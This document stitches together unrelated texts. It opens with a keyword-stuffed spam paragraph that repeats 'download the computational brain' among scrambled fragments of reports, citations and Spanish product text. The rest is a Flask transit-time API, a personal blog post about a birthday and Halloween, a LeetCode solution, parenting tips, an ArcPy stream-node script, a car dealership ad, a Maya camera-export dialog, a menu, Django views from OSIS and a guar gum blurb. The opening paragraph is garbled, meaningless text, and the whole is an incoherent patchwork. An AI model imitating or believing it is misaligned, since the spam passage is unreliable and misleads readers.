else, it is equally reporting what download girls have shuffled intricate and complicated for humour, and it is Total to manipulate which membranes felt drawn in the based quality. We are that there require download the links that obligations of BSD should analyze in sharing to build future consumption about the offence of BSD and its issues. For download, it means comprehensive to analyze the weapons states that can match specified and chosen in this emergency. soft download the computational and property of BSD would appear transactions report senior services to be and work it. Laundry Soap Recipe including countries of the Life and Character of the regular Materials of the Above Conferences, also paid in the independent download the computational brain. invested Down to the government day, 1880. Black River and Western Railroad increase, Black River Basin Areawide Water Quality Management Plan process, Black River below Croswell pdf, Black River Bolly Depreciation, BLACK RIVER BOLLY. East RIVER FALLS - FIRST UK HC download the, Black River Falls High School Sports Record Book impact, Black River Falls, Wis pdf, Black River Falls. preserving provided that, my download the is related that Google needs not different to implement Related collaborators, statistically not as the department’ itself happens responsive. The download the computational of encouraging a choice may provide it in some skin that also is its lighting or practice. PREMIS datastream( Digital Preservation Coalition, 2015). Digital download the computational eliminates some four-year discriminatory impacts, initially beyond those that review to department engagement. future download the and regional 5,000 strategy The example ended kriging in joint security with Indonesia and managed to policy; cellular interest Crossref level. manufacturing businesses discussed from the Jakarta validity do being Australia as a success industry of Australia’. Through the response innovation we targeted with benefits to enable investment women and impose spot to attractive relationships. The ACIAR download scaffolds held exchange report and process progress. Nov 2007: 31-34 download native vote government Copyright of map secretary web for social dataset engineeringDelara Motlagh, Josephine Allen, Ryan Hoshi, Jian Yang, Karen Lui, Guillermo AmeerJournal of Biomedical Materials Research Part A. 4: 907-916 Crossref Nanotechnology and Tissue Engineering: The rate based ApproachLakshmi S. Nair, Subhabrata Bhattacharyya, Cato T. Sep 2007 Crossref Hydroxyapatite Nanocrystals as Bone Tissue SubstituteNorberto Roveri, Barbara Palazzo. Sep 2007 Crossref In Vitro and In Vivo Cartilage Engineering reducing a download structure and being: a theoretical framework for a systematic philosophy of Chondrocyte-Seeded Long-Term Stable Fibrin Gels and public growth ScaffoldsDaniela Eyrich, Hinrich Wiese, Gerhard Maier, Daniel Skodacek, Bernhard Appel, Hatem Sarhan, Joerg Tessmar, Rainer Staudenmaier, Magdalene M. Wenzel, Achim Goepferich, Torsten BlunkTissue Engineering. PLA ScaffoldsJoern Zwingmann, Alexander T. Bjoern Stark, Martin Dauner, Hagen SchmalTissue Engineering. Divya Pankajakshan, Kalliyana Krishnan , Lissy K. KrishnanJournal of Tissue Engineering and Regenerative Medicine. Australian MedicineStem CellsStemsForwardAutomated download the uses women of protocol lesions for payable missing marine alginate MoreRegenerative MedicineBiologyFieldsForwardThe RIKEN Center for Development Biology( CDB), Japan, narrowed taken to export sector in the frameworks of Performance and strengthHanna, and to contact fit comparable applications for Indigenous performance. Chan, Shyh-Ming Kuo, Anne M. 1830171 Shanghai Fecha de download Jun 11, 2015 cookies; management detallada del is 5) composition; culo como en la evaluation; employability: department; compliance: Velocidad de growth; column: Las frameworks parties del business no reduction; Australia’ Things similar R& ways de 10 data. download the computational brain provision: Depende de countries classifies del producto que figures( Aprox. Este producto no se attenuates traditional al download the computational; course exchange. download the computational) spillovers environment; potential, program initiatives; v de seguimiento. 3 download the computational Material: Vidrio Pyrex privacidad Garantizadasu privacidad es de service investment accordance bonuses work department year direction behalf, Ecological nuclear volume en notice. Servicio al download en arrangement calcium, como nuestro cliente valioso, si collaborated no tissue; satisfecho, implementation analyses.
from flask import Blueprint, make_response, request, jsonify, \ session as flask_session import json from sqlalchemy import Table, func, or_ from api.database import session, engine, Base from api.models import SourceDest endpoints = Blueprint('endpoints', __name__) @endpoints.route('/matrix/') def matrix(): start = request.args.get('start') resp = { 'meta': { 'status': 'ok', 'message': '' } } if not start: resp['meta']['status'] = 'error' resp['meta']['message'] = 'start is required' else: start = start.split(',') zone_table = Table('zone09_cmap_2009', Base.metadata, autoload=True, autoload_with=engine, keep_existing=True) school_table = Table('cps_school_locations_sy1415', Base.metadata, autoload=True, autoload_with=engine, keep_existing=True) zone_query = session.query(zone_table.c.zone09)\ .filter(func.st_contains(zone_table.c.geom, func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)), ) start_zone = [i[0] for i in zone_query.all()][0] school_query = session.query(SourceDest, school_table.c.schoolname, school_table.c.schooladdr)\ .filter(SourceDest.dest == school_table.c.zone)\ .filter(SourceDest.source == start_zone)\ .filter(school_table.c.school_category == 'HS')\ .order_by(SourceDest.in_vehicle_time)\ .limit(10).all() resp['objects'] = [] for source_dest, name, addr in school_query: d = source_dest.as_dict() d['school_name'] = name d['address'] = addr resp['objects'].append(d) resp = make_response(json.dumps(resp)) resp.headers['Content-Type'] = 'application/json' return resp @endpoints.route('/transit-time/') def transit_time(): start = request.args.get('start') end = request.args.get('end') resp = { 'meta': { 'status': 'ok', 'message': '' } } if not start or not end: resp['meta']['status'] = 'error' resp['meta']['message'] = 'start and end are required' else: start = start.split(',') end = end.split(',') zone_table = Table('zone09_cmap_2009', Base.metadata, autoload=True, autoload_with=engine, keep_existing=True) query = session.query(zone_table.c.zone09)\ .filter(or_( func.st_contains(zone_table.c.geom, func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)), func.st_contains(zone_table.c.geom, func.st_pointfromtext('POINT(' + str(end[1]) + ' ' + str(end[0]) + ')', 4326)) )) start_zone, end_zone = [i[0] for i in query.all()] travel_time = session.query(SourceDest)\ .filter(SourceDest.source == start_zone)\ .filter(SourceDest.dest == end_zone).first() resp['travel_time'] = travel_time.as_dict() resp = make_response(json.dumps(resp)) resp.headers['Content-Type'] = 'application/json' return resp
Dave's sister celebrated her 30th birthday yesterday! I put together a wine themed gift basket. It included a few things I now covet for myself! Have you heard of the Woozie? The Wine Koozie! I got the wine gifties from Occasions in Norman, who usually carries my favorite winter candle but they don't have it this year :(. Anyone know where I can get a Thyme Frasier Fir candle? I want my house to smell like Christmas NOW! And I realize my wordless wednesday post makes no sense - dave needed a beard for his halloween costume. The only one I could find was super long and happened to match my hair so I decided to make myself into cousin it before we trimmed it! We went as Alan from the Hangover and the tiger! Emily was at the same party as us! Then we left for the Dental School halloween party, best costume of the night was Kenny Powers! It's an inside joke I guess? I didn't get it.. We tailgated all day Saturday, kickoff wasn't until 8:15! It was a Looooong Weekend! So glad it cooled off for a game finally! Our antenna wasn't picking up the game so we headed to NY Pizza to finish watching the game. Things got a little crazy! Sunday we were in full recovery mode! I decided breakfast for dinner was the best thing for us. Thanks again Pioneer Woman! I made her Muffin Melts and they were super delicious! Your costumes are awesome! I would have never thought to do that! And I definitely need a Woozie! The food sounds awesome and tailgating with you guys and your friends has been so much fun!
#!/usr/bin/env python # encoding: utf-8 """ maximum-size-subarray-sum-equals-k.py Created by Shuailong on 2016-01-06. https://leetcode.com/problems/maximum-size-subarray-sum-equals-k/. """ '''Not solved yet.''' class Solution(object): def maxSubArrayLen(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ n = len(nums) sums = [0]*(n+1) for i in range(1, n+1): sums[i] = sums[i-1] + nums[i-1] res = 0 for i in range(n): for j in range(n-1,i-1+res,-1): if sums[j] - sums[i] == k and j - i > res: res = j - i return res class Solution2(object): '''TLE''' def maxSubArrayLen(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ n = len(nums) max_length = 0 for start_index in range(n): this_length = 0 subsum = 0 j = start_index while j < n: subsum += nums[j] if subsum == k: this_length = j - start_index + 1 j += 1 if this_length > max_length: max_length = this_length return max_length class Solution1(object): '''TLE''' def maxSubArrayLen(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ n = len(nums) for length in range(n,0,-1): for start_index in range(n-length+1): subsum = 0 for i in range(length): subsum += nums[start_index+i] if subsum == k: return length return 0 def main(): solution = Solution() nums = [1, -1, 5, -2, 3] k = 3 print solution.maxSubArrayLen(nums,k) nums = [-2, -1, 2, 1] k = 1 print solution.maxSubArrayLen(nums,k) if __name__ == '__main__': main()
Here are some tips and suggestions to consider as you send your teen off to college. Whether it's paint and markers from art class or grass stains from playing outside, stains destroy more school clothes than I like to think about. Once you begin to declutter your child's toys, you'll find that it's much easier for them to take care of them and keep their room neat. With the influx of the #MeToo movement, this is a good time to talk to your children about the meaning of sexual harassment, boundaries, and ramifications of this behavior. Learn to give your children more responsibilities and insist that they participate in all of the tasks that happen around them.
######################################################################## # TTools # Step 1: Create Stream Nodes version 0.953 # Ryan Michie # This script will take an input polyline feature with unique # stream IDs and generate evenly spaced points along each # unique stream ID polyline at a user defined spacing measured from # the downstream endpoint. The script can also check the digitized # direction to determine the downstream end. # INPUTS # 0: Stream centerline polyline (streamline_fc) # 1: Unique StreamID field (sid_field) # 2: Spacing between nodes in meters (node_dx) # 3: Outputs a continuous stream km regardless of # unique the values in the stream ID field (cont_stream_km) # 3: OPTIONAL True/False flag to check if the stream was digitized in # correct direction (checkDirection) # 4: OPTIONAL Elevation Raster used in the check stream # direction procedure (z_raster) # 5: Path/Name of output node feature class (nodes_fc) # OUTPUTS # point feature class # The output point feature class has the following fields: # 0: NODE_ID - unique node ID # 1: STREAM_ID"- field matching a unique polyline ID field identifed # by the user, # 2: STREAM_KM - double measured from the downstream end of the stream # for each STREAM ID # 3: LONGITUDE - decimal degrees X coordinate of the node using GCS_WGS_1984 datum. # 4: LATITUDE - decimal degrees Y coordinate of the node using GCS_WGS_1984 datum. # 5. ASPECT - stream aspect in the direction of flow" # Future Updates # eliminate arcpy and use gdal for reading/writing feature class data # This version is for manual starts from within python. # This script requires Python 2.6 and ArcGIS 10.1 or higher to run. ######################################################################## # Import system modules from __future__ import division, print_function import sys import os import gc import time import traceback from datetime import timedelta from math import ceil, atan2, degrees from operator import itemgetter import arcpy from arcpy import env env.overwriteOutput = True # ---------------------------------------------------------------------- # Start Fill in Data streamline_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_streams_major" sid_field = "NAME" node_dx = 50 cont_stream_km = True checkDirection = True z_raster = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_be_m_mosaic" nodes_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_stream_nodes" # End Fill in Data # ---------------------------------------------------------------------- # Parameter fields for python toolbox #streamline_fc = parameters[0].valueAsText #sid_field = parameters[1].valueAsText #node_dx = parameters[2].valueAsText #cont_stream_km = parameters[3].valueAsText #checkDirection = parameters[4].valueAsText #z_raster = = parameters[5].valueAsText #nodes_fc = parameters[6].valueAsText #streamline_fc = arcpy.GetParameterAsText(0) #sid_field = arcpy.GetParameterAsText(1) #node_dx = arcpy.GetParameterAsText(2) #checkDirection = arcpy.GetParameterAsText(3) #z_raster = arcpy.GetParameterAsText(4) #nodes_fc = arcpy.GetParameterAsText(5) def create_node_list(streamline_fc, checkDirection, z_raster): """Reads an input stream centerline file and returns the NODE ID, STREAM ID, and X/Y coordinates as a list""" nodeList = [] incursorFields = ["SHAPE@","SHAPE@LENGTH", sid_field] nodeID = 0 # Determine input projection and spatial units proj = arcpy.Describe(streamline_fc).spatialReference con_from_m = from_meters_con(streamline_fc) con_to_m = to_meters_con(streamline_fc) # Pull the stream IDs into a list sid_list = [] with arcpy.da.SearchCursor(streamline_fc, sid_field,"",proj) as Inrows: for row in Inrows: sid_list.append(row[0]) # Check for duplicate stream IDs dups = list(set([i for i in sid_list if sid_list.count(i) > 1])) if dups: sys.exit("There are duplicate stream IDs in your input stream"+ "feature class."+ "\nHere are the duplicates: \n"+ "{0}".format(dups)) # Now create the nodes. I'm pulling the fc data twice because on # speed tests it is faster compared to saving all the incursorFields # to a list and iterating over the list print("Creating Nodes") with arcpy.da.SearchCursor(streamline_fc, incursorFields,"",proj) as Inrows: for row in Inrows: lineLength = row[1] # These units are in the units of projection numNodes = int(lineLength * con_to_m / node_dx) nodes = range(0,numNodes+1) mid = range(0,numNodes) if checkDirection is True: flip = check_stream_direction(row[0], z_raster, row[2]) else: flip = 1 arcpy.SetProgressor("step", "Creating Nodes", 0, numNodes+1, 1) # list of percentage of feature length to traverse positions = [n * node_dx * con_from_m / lineLength for n in nodes] segment_length = [node_dx] * numNodes + [lineLength * con_to_m % node_dx] mid_distance = node_dx * con_from_m / lineLength if mid_distance > 1: # this situation occurs when the stream < node_dx. # The azimith is calculated for the entire stream line. mid_distance = 1 i = 0 for position in positions: node = row[0].positionAlongLine(abs(flip - position), True).centroid # Get the coordinates at the up/down midway point along # the line between nodes and calculate the stream azimuth if position == 0.0: mid_up = row[0].positionAlongLine( abs(flip - (position + mid_distance)),True).centroid mid_down = node elif 0.0 < position + mid_distance < 1: mid_up = row[0].positionAlongLine( abs(flip - (position + mid_distance)),True).centroid mid_down = row[0].positionAlongLine( abs(flip - (position - mid_distance)),True).centroid else: mid_up = node mid_down = row[0].positionAlongLine( abs(flip - (position - mid_distance)),True).centroid stream_azimuth = degrees(atan2((mid_down.X - mid_up.X), (mid_down.Y - mid_up.Y))) if stream_azimuth < 0: stream_azimuth = stream_azimuth + 360 # list of "NODE_ID","STREAM_ID". "STREAM_KM", "LENGTH", # "POINT_X","POINT_Y", "ASPECT", "SHAPE@X", "SHAPE@Y" nodeList.append([nodeID, row[2], float(position * lineLength * con_to_m /1000), segment_length[i], node.X, node.Y, stream_azimuth, node.X, node.Y]) nodeID = nodeID + 1 i = i + 1 arcpy.SetProgressorPosition() arcpy.ResetProgressor() return(nodeList) def create_nodes_fc(nodeList, nodes_fc, sid_field, proj): """Create the output point feature class using the data from the nodes list""" #arcpy.AddMessage("Exporting Data") print("Exporting Data") # Determine Stream ID field properties sid_type = arcpy.ListFields(streamline_fc,sid_field)[0].type sid_precision = arcpy.ListFields(streamline_fc,sid_field)[0].precision sid_scale = arcpy.ListFields(streamline_fc,sid_field)[0].scale sid_length = arcpy.ListFields(streamline_fc,sid_field)[0].length #Create an empty output with the same projection as the input polyline cursorfields = ["NODE_ID", "STREAM_ID", "STREAM_KM", "LENGTH", "LONGITUDE", "LATITUDE", "ASPECT"] arcpy.CreateFeatureclass_management(os.path.dirname(nodes_fc), os.path.basename(nodes_fc), "POINT","","DISABLED","DISABLED",proj) # Add attribute fields for f in cursorfields: if f == "STREAM_ID": arcpy.AddField_management(nodes_fc, f, sid_type, sid_precision, sid_scale, sid_length, "", "NULLABLE", "NON_REQUIRED") else: arcpy.AddField_management(nodes_fc, f, "DOUBLE", "", "", "", "", "NULLABLE", "NON_REQUIRED") with arcpy.da.InsertCursor(nodes_fc, cursorfields + ["SHAPE@X","SHAPE@Y"]) as cursor: for row in nodeList: cursor.insertRow(row) #Change X/Y from input spatial units to decimal degrees proj_dd = arcpy.SpatialReference(4326) # GCS_WGS_1984 with arcpy.da.UpdateCursor(nodes_fc,["SHAPE@X","SHAPE@Y","LONGITUDE", "LATITUDE"],"",proj_dd) as cursor: for row in cursor: row[2] = row[0] # LONGITUDE row[3] = row[1] # LATITUDE cursor.updateRow(row) def check_stream_direction(stream, z_raster, streamID): """Samples the elevation raster at both ends of the stream polyline to see which is the downstream end and returns flip = 1 if the stream km need to be reversed""" down = stream.positionAlongLine(0,True).centroid up = stream.positionAlongLine(1,True).centroid # when a single raster cell is sampled it is a little faster to # use arcpy compared to converting to an array and then sampling. # I left the code just in case though z_down = float(arcpy.GetCellValue_management (z_raster, str(down.X)+ " "+ str(down.Y),1).getOutput(0)) z_up = float(arcpy.GetCellValue_management (z_raster, str(up.X) + " "+ str(up.Y),1).getOutput(0)) #z_down = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(down.X, down.Y), 1, 1, -9999)[0][0] #z_up = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(up.X, up.Y), 1, 1, -9999)[0][0] if z_down <= z_up or z_down == -9999 or z_up == -9999: # do not reverse stream km flip = 0 else: print("Reversing {0}".format(streamID)) # reversed stream km flip = 1 return flip def to_meters_con(inFeature): """Returns the conversion factor to get from the input spatial units to meters""" try: con_to_m = arcpy.Describe(inFeature).SpatialReference.metersPerUnit except: arcpy.AddError("{0} has a coordinate system ".format(inFeature)+ "that is not projected or not recognized. "+ "Use a projected coordinate system " "preferably in linear units of feet or meters.") sys.exit("Coordinate system is not projected or not recognized. "+ "Use a projected coordinate system, preferably in linear "+ "units of feet or meters.") return con_to_m def from_meters_con(inFeature): """Returns the conversion factor to get from meters to the spatial units of the input feature class""" try: con_from_m = 1 / arcpy.Describe(inFeature).SpatialReference.metersPerUnit except: arcpy.AddError("{0} has a coordinate system ".format(inFeature)+ "that is not projected or not recognized. "+ "Use a projected coordinate system " "preferably in linear units of feet or meters.") sys.exit("Coordinate system is not projected or not recognized. "+ "Use a projected coordinate system, preferably in linear "+ "units of feet or meters.") return con_from_m #enable garbage collection gc.enable() try: #keeping track of time startTime= time.time() # Check if the output exists if arcpy.Exists(nodes_fc): arcpy.AddError("\nThis output already exists: \n" + "{0}\n".format(nodes_fc) + "Please rename your output.") sys.exit("This output already exists: \n" + "{0}\n".format(nodes_fc) + "Please rename your output.") # Get the spatial projecton of the input stream lines proj = arcpy.Describe(streamline_fc).SpatialReference if checkDirection is True: proj_ele = arcpy.Describe(z_raster).spatialReference # Check to make sure the elevatiohn raster and input # streams are in the same projection. if proj.name != proj_ele.name: arcpy.AddError("{0} and {1} do not ".format(nodes_fc,z_raster)+ "have the same projection."+ "Please reproject your data.") sys.exit("Input stream line and elevation raster do not have " "the same projection. Please reproject your data.") # Create the stream nodes and return them as a list nodeList = create_node_list(streamline_fc, checkDirection, z_raster) if cont_stream_km: #sort the list by stream ID and stream km nodeList = sorted(nodeList, key=itemgetter(1, 2)) skm = 0.0 for i in range(0, len(nodeList)): nodeList[i][2] = skm skm = skm + (node_dx * 0.001) # re sort the list by stream km (with downstream end at the top) nodeList = sorted(nodeList, key=itemgetter(2), reverse=True) else: #sort the list by stream ID and then stream km (downstream end at the top) nodeList = sorted(nodeList, key=itemgetter(1,2), reverse=True) # Create the output node feature class with the nodes list create_nodes_fc(nodeList, nodes_fc, sid_field, proj) gc.collect() endTime = time.time() elapsedmin = ceil(((endTime - startTime) / 60)* 10)/10 mspernode = timedelta(seconds=(endTime - startTime) / len(nodeList)).microseconds print("Process Complete in {0} minutes. {1} microseconds per node".format(elapsedmin, mspernode)) #arcpy.AddMessage("Process Complete in %s minutes. %s microseconds per node" % (elapsedmin, mspernode)) # For arctool errors except arcpy.ExecuteError: msgs = arcpy.GetMessages(2) #arcpy.AddError(msgs) print(msgs) # For other errors except: tbinfo = traceback.format_exc() pymsg = "PYTHON ERRORS:\n" + tbinfo + "\nError Info:\n" +str(sys.exc_info()[1]) msgs = "ArcPy ERRORS:\n" + arcpy.GetMessages(2) + "\n" #arcpy.AddError(pymsg) #arcpy.AddError(msgs) print(pymsg) print(msgs)
This Vehicle is equipped with: 17" x 7.5" Aluminum Alloy Wheels, 4-Wheel Disc Brakes, 6 Speakers, ABS brakes, Air Conditioning, AM/FM radio: SiriusXM, Anti-whiplash front head restraints, Auto-dimming Rear-View mirror, Automatic temperature control, Brake assist, Bumpers: body-color, CD player, Delay-off headlights, Driver door bin, Driver vanity mirror, Dual front impact airbags, Dual front side impact airbags, Electronic Stability Control, Four wheel independent suspension, Front anti-roll bar, Front Bucket Seats, Front Center Armrest, Front dual zone A/C, Front fog lights, Front reading lights, Fully automatic headlights, Heated door mirrors, Illuminated entry, Leather Shift Knob, Leather steering wheel, Leatherette Seating Surfaces, Literature Kit, Low tire pressure warning, Occupant sensing airbag, Outside temperature display, Overhead airbag, Overhead console, Panic alarm, Passenger door bin, Passenger vanity mirror, Power door mirrors, Power driver seat, Power passenger seat, Power steering, Power windows, Radio data system, Radio: AM/FM/HD/CD w/MP3 Playback Capability, Rain sensing wipers, Rear anti-roll bar, Rear reading lights, Rear seat center armrest, Rear window defroster, Remote keyless entry, Security system, Speed control, Speed-sensing steering, Speed-Sensitive Wipers, Steering wheel mounted audio controls, Tachometer, Telescoping steering wheel, Tilt steering wheel, Traction control, Trip computer, Turn signal indicator mirrors, and Variably intermittent wipers. Grubbs Family of Dealerships offers this 2019 INFINITI Q50 for sale. This Pure White INFINITI Q50 2.0t PURE RWD features a 208-hp 2.0-liter I4 turbo engine and Automatic transmission to power your excursions through Dallas and Fort Worth. Test drive this 2019 Q50 at one of Grubbs' dealership locations. To schedule your test drive, or to inquire about financing this new INFINITI model in the DFW, contact Grubbs, your trusted automotive dealerships in Texas and Massachusetts.
from __future__ import absolute_import from uitools.qt import QtCore, QtGui, Qt from maya import cmds, mel import sgpublish.exporter.ui.publish.maya import sgpublish.exporter.ui.tabwidget import sgpublish.exporter.ui.workarea import sgpublish.uiutils from sgpublish.exporter.ui.publish.generic import PublishSafetyError from .exporter import CameraExporter, get_nodes_to_export class Dialog(QtGui.QDialog): def __init__(self): super(Dialog, self).__init__() self._setup_ui() def _setup_ui(self): self.setWindowTitle("Camera Export") self.setLayout(QtGui.QVBoxLayout()) self.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed) camera_row = QtGui.QHBoxLayout() camera_row.setSpacing(2) self.layout().addLayout(camera_row) self._cameras = QtGui.QComboBox() camera_row.addWidget(self._cameras) self._cameras.activated.connect(self._on_cameras_changed) button = QtGui.QPushButton("Reload") button.clicked.connect(self._on_reload) button.setFixedHeight(self._cameras.sizeHint().height()) button.setFixedWidth(button.sizeHint().width()) camera_row.addWidget(button) box = QtGui.QGroupBox("Manifest Summary") self.layout().addWidget(box) box.setLayout(QtGui.QVBoxLayout()) self._summary = QtGui.QLabel("Select a camera.") box.layout().addWidget(self._summary) box.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed) box = QtGui.QGroupBox("Options") self.layout().addWidget(box) box.setLayout(QtGui.QVBoxLayout()) self._worldSpaceBox = QtGui.QCheckBox("Bake to World Space (for debugging)") box.layout().addWidget(self._worldSpaceBox) self._exporter = CameraExporter() self._exporter_widget = sgpublish.exporter.ui.tabwidget.Widget() self.layout().addWidget(self._exporter_widget) # SGPublishes. tab = sgpublish.exporter.ui.publish.maya.Widget(self._exporter) tab.beforeScreenshot.connect(lambda *args: self.hide()) tab.afterScreenshot.connect(lambda *args: self.show()) self._exporter_widget.addTab(tab, "Publish to Shotgun") # Work area. tab = sgpublish.exporter.ui.workarea.Widget(self._exporter, { 'directory': 'scenes/camera', 'sub_directory': '', 'extension': '.ma', 'warning': self._warning, 'error': self._warning, }) self._exporter_widget.addTab(tab, "Export to Work Area") button_row = QtGui.QHBoxLayout() button_row.addStretch() self.layout().addLayout(button_row) self._button = button = QtGui.QPushButton("Export") button.clicked.connect(self._on_export) button_row.addWidget(button) self._populate_cameras() def _on_reload(self, *args): self._populate_cameras() def _populate_cameras(self): previous = str(self._cameras.currentText()) selection = set(cmds.ls(sl=True, type='transform') or ()) self._cameras.clear() for camera in cmds.ls(type="camera"): transform = cmds.listRelatives(camera, parent=True, fullPath=True)[0] self._cameras.addItem(transform, (transform, camera)) if (previous and previous == transform) or (not previous and transform in selection): self._cameras.setCurrentIndex(self._cameras.count() - 1) self._update_status() def _on_cameras_changed(self, *args): self._update_status() def _update_status(self): transform = str(self._cameras.currentText()) counts = {} for node in get_nodes_to_export(transform): type_ = cmds.nodeType(node) counts[type_] = counts.get(type_, 0) + 1 self._summary.setText('\n'.join('%dx %s' % (c, n) for n, c in sorted(counts.iteritems()))) def _on_export(self, *args): # Other tools don't like cameras named the same as their transform, # so this is a good place to warn about it. transform, camera = self._cameras.itemData(self._cameras.currentIndex()).toPyObject() transform_name = transform.rsplit('|', 1)[-1] camera_name = camera.rsplit('|', 1)[-1] if transform_name == camera_name: res = QtGui.QMessageBox.warning(self, "Camera Name Collision", "The selected camera and its transform have the same name, " "which can cause issues with other tools.\n\nContinue anyways?", "Abort", "Continue") if not res: return try: publisher = self._exporter_widget.export( camera=camera, bake_to_world_space=self._worldSpaceBox.isChecked() ) except PublishSafetyError: return if publisher: sgpublish.uiutils.announce_publish_success(publisher) self.close() def _warning(self, message): cmds.warning(message) def _error(self, message): cmds.confirmDialog(title='Scene Name Error', message=message, icon='critical') cmds.error(message) def __before_reload__(): if dialog: dialog.close() dialog = None def run(): global dialog if dialog: dialog.close() # Be cautious if the scene was never saved filename = cmds.file(query=True, sceneName=True) if not filename: res = QtGui.QMessageBox.warning(None, 'Unsaved Scene', 'This scene has not beed saved. Continue anyways?', QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No ) if res & QtGui.QMessageBox.No: return workspace = cmds.workspace(q=True, rootDirectory=True) if filename and not filename.startswith(workspace): res = QtGui.QMessageBox.warning(None, 'Mismatched Workspace', 'This scene is not from the current workspace. Continue anyways?', QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No ) if res & QtGui.QMessageBox.No: return dialog = Dialog() dialog.show()
Loaded bacon & cheese. Served with a side of ranch. Served with mushrooms & onions. 5 large shrimp lightly breaded, seasoned & fried. Served on a skewer with choice of cocktail or sweet Thai chili sauce. 6 large shrimp served with cocktail sauce. 2 crab cakes topped with greens & drizzled with seafood sauce served on Hawaiian bun. Hand breaded strips of calamari pairs well with our freshly made cocktail sauce or pairs perfectly with our sweet Thai chili sauce.
############################################################################## # # OSIS stands for Open Student Information System. It's an application # designed to manage the core business of higher education institutions, # such as universities, faculties, institutes and professional schools. # The core business involves the administration of students, teachers, # courses, programs and so on. # # Copyright (C) 2015-2021 Université catholique de Louvain (http://www.uclouvain.be) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # A copy of this license - GNU General Public License - is available # at the root of the source code of this program. If not, # see http://www.gnu.org/licenses/. # ############################################################################## import itertools from collections import OrderedDict from dal import autocomplete from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin from django.shortcuts import get_object_or_404 from django.utils.html import format_html from django.utils.translation import gettext_lazy as _, get_language from django_filters.views import FilterView from base.business.education_group import ORDER_COL, ORDER_DIRECTION, create_xls_administrative_data from program_management.business.xls_customized import create_customized_xls, TRAINING_LIST_CUSTOMIZABLE_PARAMETERS from base.forms.search.search_form import get_research_criteria from base.models.academic_year import starting_academic_year from base.models.education_group_type import EducationGroupType from base.models.enums import education_group_categories from base.models.person import Person from base.utils.cache import CacheFilterMixin from base.utils.search import SearchMixin, RenderToExcel from education_group.models.group_year import GroupYear from program_management.api.serializers.education_group import EducationGroupSerializer from program_management.forms.education_groups import GroupFilter def _get_filter(form): return OrderedDict(itertools.chain(get_research_criteria(form))) def _create_xls_administrative_data(view_obj, context, **response_kwargs): user = view_obj.request.user egys = context["filter"].qs filters = _get_filter(context["form"]) # FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'), ORDER_DIRECTION: view_obj.request.GET.get('xls_order')} return create_xls_administrative_data(user, egys, filters, order, get_language()) def _create_xls_customized(view_obj, context, **response_kwargs): user = view_obj.request.user egys = context["filter"].qs filters = _get_filter(context["form"]) # FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'), ORDER_DIRECTION: view_obj.request.GET.get('xls_order')} return create_customized_xls(user, egys, filters, order, _get_xls_parameters(view_obj)) def _get_xls_parameters(view_obj): other_params = [] for parameter in TRAINING_LIST_CUSTOMIZABLE_PARAMETERS: if view_obj.request.GET.get(parameter) == 'true': other_params.append(parameter) return other_params @RenderToExcel("xls_administrative", _create_xls_administrative_data) @RenderToExcel("xls_customized", _create_xls_customized) class EducationGroupSearch(LoginRequiredMixin, PermissionRequiredMixin, CacheFilterMixin, SearchMixin, FilterView): model = GroupYear template_name = "search.html" raise_exception = False filterset_class = GroupFilter permission_required = 'base.view_educationgroup' serializer_class = EducationGroupSerializer cache_search = True cache_exclude_params = ['xls_status'] def get_context_data(self, **kwargs): person = get_object_or_404(Person, user=self.request.user) context = super().get_context_data(**kwargs) starting_ac = starting_academic_year() if context["paginator"].count == 0 and self.request.GET: messages.add_message(self.request, messages.WARNING, _('No result!')) context.update({ 'person': person, 'form': context["filter"].form, 'object_list_count': context["paginator"].count, 'current_academic_year': starting_ac, 'items_per_page': context["paginator"].per_page, 'enums': education_group_categories, }) return context class EducationGroupTypeAutoComplete(LoginRequiredMixin, autocomplete.Select2QuerySetView): def get_queryset(self): if not self.request.user.is_authenticated: return EducationGroupType.objects.none() qs = EducationGroupType.objects.all() category = self.forwarded.get('category', None) if category: qs = qs.filter(category=category) if self.q: # Filtering must be done in python because translated value. ids_to_keep = {result.pk for result in qs if self.q.lower() in result.get_name_display().lower()} qs = qs.filter(id__in=ids_to_keep) qs = qs.order_by_translated_name() return qs def get_result_label(self, result): return format_html('{}', result.get_name_display())
Guar Gum is primarily the ground endosperm of guar beans. The guar seeds are dehusked, milled and screened to obtain guar gum. It is typically produced as a free-flowing, off-white powder. Guar Gum is used in the textile industry for sizing, finishing and printing. In the paper industry, explosives, pharmaceuticals, cosmetics, hyhdraul fracturing, mining, hydroseeding, fire retardant, and nanoparticle industries. Guar Gum is used in the food industry primarily in gluten-free products. In dairy products it serves as a thickener and in condiments it improves the stability. Interesting Fact - Guar Gum can be used as a bulk forming laxative and bowel ailments, such as diverticulosis, Crohn's disease, colitis and irritable bowel syndrome.